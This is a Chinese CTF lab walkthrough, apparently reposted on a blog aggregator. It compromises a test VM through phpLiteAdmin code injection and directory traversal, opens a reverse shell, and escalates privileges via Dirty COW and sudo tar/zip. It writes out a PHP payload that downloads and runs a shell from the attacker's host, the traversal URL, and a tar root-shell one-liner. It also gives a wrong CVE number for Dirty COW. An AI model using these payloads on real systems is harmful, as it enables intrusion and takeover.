CTF靶场-目录遍历getshell+内核溢出提权/密码复用提权

2024-02-29 01:32

本文主要是介绍CTF靶场-目录遍历getshell+内核溢出提权/密码复用提权,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

实验环境

攻击者:Kali Linux(192.168.0.19)
靶机:Oracle VM VirtualBox 6.1.10——Ubuntu(64-bit)(192.168.0.249)

实验流程

  • 端口扫描
    在这里插入图片描述
  • 目录扫描
    其中/dbadmin/疑似网站数据库后台管理页面
    在这里插入图片描述
  • 访问url:http://192.168.0.249/dbadmin
    在这里插入图片描述在这里插入图片描述
  • 弱口令:admin
    在这里插入图片描述
  • 该web程序为phpliteadmin v1.9.3,存在远程代码执行漏洞,没有溢出代码,但是有一个利用文档中包含了对于该web应用程序getshell的流程,其中上传的PHP脚本文件需要进行访问才能生效。
    在这里插入图片描述在这里插入图片描述
  • 漏洞探测
    通过对该网站进行漏洞扫描发现该网站存在目录遍历漏洞
    在这里插入图片描述
  • 目录遍历漏洞验证
    在这里插入图片描述
  • 结合phpliteadmin的代码执行漏洞和目录遍历漏洞getshell
    输入数据库名称,点击create创建数据库——hack.php
    在这里插入图片描述点击新创建的数据库,输入数据表名称和数据表中的字段数量,点击go,创建数据表
    在这里插入图片描述输入字段名、字段类型,点击create创建字段,注意字段类型选择text。
    在这里插入图片描述准备好要上传到服务器上面的文件
    在这里插入图片描述
    利用python创建HTTP服务,将root用户的家目录作为网站的根目录
    在这里插入图片描述
    点击新创建的数据库,选中新创建的数据表,点击insert插入数据。<?php system("wget http://192.168.0.19:8000/shell.php -O /tmp/shell.php; chmod +x /tmp/shell.php; php /tmp/shell.php;"); ?>
    在这里插入图片描述
    攻击机监听端口
    在这里插入图片描述利用目录遍历漏洞访问该文件反弹shell:http://192.168.0.249/view.php?page=…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/usr/databases/hack.php
    在这里插入图片描述
  • 获取当前权限:www-data是Linux操作系统中运行web服务的默认用户(权限较低)
    在这里插入图片描述
  • 获取操作系统内发行版本(Ubuntu 12.04.5 LTS)和内核版本(3.2.0-23-generic)
    在这里插入图片描述
    判断是否存在代码溢出漏洞,有溢出代码
    在这里插入图片描述
  • 利用脏牛提权(cve-2016-5159)
    将提权文件上传到靶机
    溢出代码下地址:https://github.com/FireFart/dirtycow
    在这里插入图片描述
    在这里插入图片描述访问对应的数据库文件
    在这里插入图片描述在这里插入图片描述
    优化shell
    在这里插入图片描述
    编译并执行溢出代码
    在这里插入图片描述
    赋予执行权限
    在这里插入图片描述
    执行溢出代码
    在这里插入图片描述
    切换用户
    在这里插入图片描述
  • 获取flag
    在这里插入图片描述
  • 利用密码复用进行提权
    因为需要涉及到切换用户的问题同样需要利用python优化shell
    利用获取到的低权限用户在系统中搜寻敏感信息,寻找一些可能存储了密码的敏感文件或者网站的配置文件等,一定要查看系统用户的家目录。
    在这里插入图片描述
    通过查看网站的配置文件拿到数据库用户zico的登录密码
    在这里插入图片描述
    尝试使用该密码切换到zico用户,成功
    在这里插入图片描述
    查看当前用户权限,普通系统用户。
    在这里插入图片描述
    查看当前用户使用sudo命令时的权限
    当前用户在使用tar命令和zip命令时拥有root用户的权限,并且不需要验证密码
    在这里插入图片描述
    利用zip提权
    首先创建一个空文件
    在这里插入图片描述
    提权成功
    在这里插入图片描述
    同样可以利用tar命令进行提权
    sudo -u root tar cf /dev/null exp -checkpoint=1 --checkpoint-action="/bin/bash"

这篇关于CTF靶场-目录遍历getshell+内核溢出提权/密码复用提权的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/757203

相关文章

Python从零打造高安全密码管理器

《Python从零打造高安全密码管理器》在数字化时代,每人平均需要管理近百个账号密码,本文将带大家深入剖析一个基于Python的高安全性密码管理器实现方案,感兴趣的小伙伴可以参考一下... 目录一、前言:为什么我们需要专属密码管理器二、系统架构设计2.1 安全加密体系2.2 密码强度策略三、核心功能实现详解

新特性抢先看! Ubuntu 25.04 Beta 发布:Linux 6.14 内核

《新特性抢先看!Ubuntu25.04Beta发布:Linux6.14内核》Canonical公司近日发布了Ubuntu25.04Beta版,这一版本被赋予了一个活泼的代号——“Plu... Canonical 昨日(3 月 27 日)放出了 Beta 版 Ubuntu 25.04 系统镜像,代号“Pluc

Linux修改pip临时目录方法的详解

《Linux修改pip临时目录方法的详解》在Linux系统中,pip在安装Python包时会使用临时目录(TMPDIR),但默认的临时目录可能会受到存储空间不足或权限问题的影响,所以本文将详细介绍如何... 目录引言一、为什么要修改 pip 的临时目录?1. 解决存储空间不足的问题2. 解决权限问题3. 提

SpringSecurity 认证、注销、权限控制功能(注销、记住密码、自定义登入页)

《SpringSecurity认证、注销、权限控制功能(注销、记住密码、自定义登入页)》SpringSecurity是一个强大的Java框架,用于保护应用程序的安全性,它提供了一套全面的安全解决方案... 目录简介认识Spring Security“认证”(Authentication)“授权” (Auth

Oracle登录时忘记用户名或密码该如何解决

《Oracle登录时忘记用户名或密码该如何解决》:本文主要介绍如何在Oracle12c中忘记用户名和密码时找回或重置用户账户信息,文中通过代码介绍的非常详细,对同样遇到这个问题的同学具有一定的参... 目录一、忘记账户:二、忘记密码:三、详细情况情况 1:1.1. 登录到数据库1.2. 查看当前用户信息1.

SpringBoot使用Jasypt对YML文件配置内容加密的方法(数据库密码加密)

《SpringBoot使用Jasypt对YML文件配置内容加密的方法(数据库密码加密)》本文介绍了如何在SpringBoot项目中使用Jasypt对application.yml文件中的敏感信息(如数... 目录SpringBoot使用Jasypt对YML文件配置内容进行加密(例:数据库密码加密)前言一、J

在 Spring Boot 中使用异步线程时的 HttpServletRequest 复用问题记录

《在SpringBoot中使用异步线程时的HttpServletRequest复用问题记录》文章讨论了在SpringBoot中使用异步线程时,由于HttpServletRequest复用导致... 目录一、问题描述:异步线程操作导致请求复用时 Cookie 解析失败1. 场景背景2. 问题根源二、问题详细分

MySQL9.0默认路径安装下重置root密码

《MySQL9.0默认路径安装下重置root密码》本文主要介绍了MySQL9.0默认路径安装下重置root密码,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们... 目录问题描述环境描述解决方法正常模式下修改密码报错原因问题描述mysqlChina编程采用默认安装路径,

MySQL修改密码的四种实现方式

《MySQL修改密码的四种实现方式》文章主要介绍了如何使用命令行工具修改MySQL密码,包括使用`setpassword`命令和`mysqladmin`命令,此外,还详细描述了忘记密码时的处理方法,包... 目录mysql修改密码四种方式一、set password命令二、使用mysqladmin三、修改u

电脑密码怎么设置? 一文读懂电脑密码的详细指南

《电脑密码怎么设置?一文读懂电脑密码的详细指南》为了保护个人隐私和数据安全,设置电脑密码显得尤为重要,那么,如何在电脑上设置密码呢?详细请看下文介绍... 设置电脑密码是保护个人隐私、数据安全以及系统安全的重要措施,下面以Windows 11系统为例,跟大家分享一下设置电脑密码的具体办php法。Windo